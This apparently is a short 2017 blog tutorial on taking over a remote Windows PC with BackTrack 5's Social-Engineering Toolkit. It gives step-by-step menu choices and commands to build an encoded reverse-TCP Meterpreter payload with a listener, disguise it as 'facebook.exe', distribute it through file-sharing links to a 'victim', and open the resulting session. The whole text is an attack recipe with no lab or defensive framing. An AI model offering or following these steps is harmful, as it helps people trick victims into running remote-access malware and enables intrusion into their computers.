Friday, October 13, 2017

Hack Remote PC using Payload in BackTrack 5

Open Your Backtrack terminal and Type cd  /pentest/exploits/set
Now Open Social Engineering Toolkit (SET) ./set

Now choose option 1, “Social-Engineering Attacks
Now choose option 4, “Create Payload and Listener
Now choose 2 “Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program.
Now choose 2 “shikata-ga-nai
Now choose a port for the listener, choose a random port 443 and then I choose Yes on starting a listener.
Now a file name msf.exe has been created, you can get the file by going on file system–>pentest>exploit–>set–>msf.exe
Now rename the file anything you want. In my case I am renaming it facebook.exe
Now upload your exe on file sharing website like filesonic, rapidshare, and megaupload. In my case I am using now send link to the victim. 
As soon as our victim downloads and executes our facebook.exe, now you have access to the victims PC
Use “Sessions -l” and the Session number to connect to the session.  Now Type “session s -i ID“.

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